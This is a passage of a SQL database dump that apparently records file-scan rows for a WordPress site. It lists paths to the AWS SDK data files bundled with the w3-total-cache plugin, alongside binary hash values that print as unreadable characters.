',',*܏1`\\S.WH0]','',0,'?'),('p|LZ>tO8x_qk','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w0A679q','#,ltx+=%\\\'U%R~g','',0,'?'),('8QąN[\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Έj ށG?G!o','4sۡ^! ps?1{1v','',0,'?'),('U ڰ6I/','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B4\'Ԏ','ڎg&MeHH1%H1D','etpuY뇽y2.F+Q!{','',0,'?'),(')h:c2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3','-DJ9s߮qy6]JVbfA|','',0,'?'),(';}ttff','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','al)`GBk','yf6^5Ei+~wt1k-','',0,'?'),('/\\M;r#2qB','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h+j4$\ZI\0','H#qdd6꽟#@߯+]iE6','',0,'?'),('Rp(\'Åڳb','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e I^:r','》Ϡ)n ;X&sF v','',0,'?'),('\\ D+!T}p','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[oVuѶ*','/I; sHnJۺCWcBs/]','',0,'?'),('n`]vZV}}','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','km \'b8KQ','C_)@e285֠\0','',0,'?'),('ê\0uZ~\r\Zq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[֕drf','m]~dWjbtߴA~Ԧ =X?','',0,'?'),('^hV26b%r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\\;\'Xza1[L','$1TUE}Ə,&JhC!(P`','',0,'?'),('U(G$O','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tA!sLIb','HJ5isIOl:{P\'','',0,'?'),('/}@dS*}','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?9=7E.t15 ',':&6G{δ+^>sA-9b6 <2e','',0,'?'),('p5qO\'Wfa','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=CAβ0C','6)<\"ԓ<|U餓> 6b','',0,'?'),('TIָ\0}hB','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{_*9 0b','Vp)|\\ F~21','',0,'?'),('DKR|#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}>*G7@','(o\"$7U~N','',0,'?'),(';w9P&MǴ:w','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:.zZ\'rV','U!I\0݃N[h=.qNnGJL<\rA','',0,'?'),('>R\Z9f\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0FM|Wq$Ļ','=B\',Jfr.΂>/','',0,'?'),('=Ed7*Z\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bUS','@K9Tt|(}Awqg86','',0,'?'),('9RVPDil_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}-v,~H',' ?}V%)$5-^6WLjj[','',0,'?'),('i8Kr6)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{4kBF','_uHn]mh\\-:i~|\\','',0,'?'),('|[?=@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';wxOQt!A',' _ \\8\Z$XPU+!g|','',0,'?'),('+ZĵE+','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l}cUTT;','fy#epY\'tMqJ~i$343','',0,'?'),('=Ȟo&j[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\\:S','rdlc{([| 7ɇ@5','',0,'?'),('R7䊛','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/emr-containers/2020-10-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/emr-containers/2020-10-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ΙXm ]Aq','*;쟓JTa,RSVA_','',0,'?'),('6 o{=/:ts','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/emr-containers/2020-10-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/emr-containers/2020-10-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')a\'FN͸:','e=o0ĢeiLc/-Zj','',0,'?'),('Jk$@2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/endpoints.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/endpoints.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xC[d$','X5϶_$o<`FGmZaB','',0,'?'),('Nyӡ i ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/endpoints_prefix_history.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/endpoints_prefix_history.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4]ip','',0,'?'),('BO^&#UV','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/firehose/2015-08-04/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/firehose/2015-08-04/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','At1Y]@\"RI',']1 [B&&GJ;CSHPjf ','',0,'?'),('$uoh','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fis/2020-12-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fis/2020-12-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TeaGa',':G4KSnhe^x99 s','',0,'?'),('CaW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fms/2018-01-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fms/2018-01-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Hq@\\ r!J','1e̦\rl,`c#ɩ\\ \'8H','',0,'?'),('˝0.Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecast/2018-06-26/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecast/2018-06-26/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P:8J!Rg','iF\n}AZ:\'\ZrK_','',0,'?'),('bޙHۅ*`','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecast/2018-06-26/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecast/2018-06-26/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q2[p̰ L ','-%t`CB6cX<;FnMyW','',0,'?'),('Dlέ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecastquery/2018-06-26/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecastquery/2018-06-26/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Joi^t}x','AEͮc-U\\ͩx],2b','',0,'?'),('/ʺKOJe','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecastquery/2018-06-26/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecastquery/2018-06-26/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','El%RH','Jqfo}oļO\n\0Ofg¢','',0,'?'),('Bކa4< >_s','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/frauddetector/2019-11-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/frauddetector/2019-11-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1p,Ԏph','j?zW\n. !Xj: MQ42m','',0,'?'),('h<(FV0K','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/frauddetector/2019-11-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/frauddetector/2019-11-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˵0QA^Ϫ<','|[^\nDŽ9982','',0,'?'),('m\"G 6RY','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fsx/2018-03-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fsx/2018-03-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M]`x3Oi',';wf\'V\"t. B%3','',0,'?'),('lB@4\"ܔ\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fsx/2018-03-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fsx/2018-03-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͏m,_⍤췥','~hcT| ~=I&%C','',0,'?'),(' 8!/+{ 6Y','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lp޶n;~7D',';sa\n[\0߽u*uu~ < ','',0,'?'),('w`CEbX','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vo$q8Z','-fR,k4FKo^I˛','',0,'?'),(')mc=?Á\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j;0;dDž]','` RGc 3q\nD6E$','',0,'?'),('zj2dCa[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N8 ro:t','r/Y1s~xZ=NUh6d/u aw','',0,'?'),('KPeYQx-','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%ģdR\\','qiK\Zf/\ZF\n655%{','',0,'?'),('6iqus/e-@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ut',' a?SrbׄnVi(P','',0,'?'),('ܕ`Q7tr\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pw#Kd','.( xd|#K$','',0,'?'),(',%\'&E!{','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cxl}|u','HGK;y٬ CPtXt','',0,'?'),('\\r(8WzWuuVB','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/globalaccelerator/2018-08-08/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/globalaccelerator/2018-08-08/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$lѨĥ',',|D.i0B\0whRvwߘs','',0,'?'),('k \ZIꜚ\\:o3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/globalaccelerator/2018-08-08/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/globalaccelerator/2018-08-08/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!@+gUe;LtZ','~RDrL\" ','rJ=G*?,sYCcD:y','',0,'?'),('ڢHq+~:Gt','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\n̸㥳]k','o_J_u;w x$F*w\0jh2','',0,'?'),('ۻӇNjw','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rcOv˯A,#H',' [otN<\"ʯtiU\0\Z\Z','',0,'?'),('i;O!#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrass/2017-06-07/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrass/2017-06-07/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1/Hby2ǖg',')@ *v^(][]ON \0m','',0,'?'),('KM؏bW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrassv2/2020-11-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrassv2/2020-11-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͦES2w (','dl4*y*f_p/Rc','',0,'?'),('0^,2','',0,'?'),('&FEOEבcE','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/groundstation/2019-05-23/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/groundstation/2019-05-23/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PItpp91','LC^pɼгA\r7wlȑml','',0,'?'),(',DBu_|um','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/groundstation/2019-05-23/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/groundstation/2019-05-23/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\rt;x|,',',v{\n2e\0-j;Oؓ}n[Yc','',0,'?'),('}Sa5fkҶC','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/guardduty/2017-11-28/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/guardduty/2017-11-28/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߦ =!4+',';4Ulq GyA4LH/B=','',0,'?'),('\'&xFw','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/guardduty/2017-11-28/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/guardduty/2017-11-28/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u!DShkQ',')AcօHp™U)Ena','',0,'?'),(':ܚ-h r߱','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/health/2016-08-04/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/health/2016-08-04/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GՕCC=G5[','7Z@BJ9Z7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DYMi1d6@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/identitystore/2020-06-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/identitystore/2020-06-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0򛼌S2J\0l','%=]X#\0ά\nI_3;','',0,'?'),('NIVm껽BaJ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/identitystore/2020-06-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/identitystore/2020-06-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cbZE8dbM{','=;аVK4ᐊժM\nl\r','',0,'?'),(';O0.}Q{O','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/imagebuilder/2019-12-02/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/imagebuilder/2019-12-02/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CflWcbXF','Jj,+}xl!\'i=N','',0,'?'),('idwEP({`','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/imagebuilder/2019-12-02/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/imagebuilder/2019-12-02/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ^?f\\$','XȈ1DD&6؟{!','',0,'?'),('6I_\\+;\";','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/importexport/2010-06-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/importexport/2010-06-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'NMV','$χ&nORP28x3\ZO(','',0,'?'),('_oл*UJpG','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/importexport/2010-06-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/importexport/2010-06-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u:PY@?GF','?x|~qӺw`5יⴤzI','',0,'?'),('AJfKiC','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{|.XHq/4^c','W4N54\"|lNUaN','',0,'?'),('RB7qc|({-','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k\'!\"','v4RPEN]rb;)¹0}s训U','',0,'?'),('(0$?:^eU','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@+(v4dD','`fnwSxܓ2/W qh','',0,'?'),('5VwU齙\0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=iZB','.$lo?pZ$7S?jO s','',0,'?'),('~=p-df$^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s|P, q)','E)8ڽKZ^@nܭZjS& ','',0,'?'),('ZRdh| n 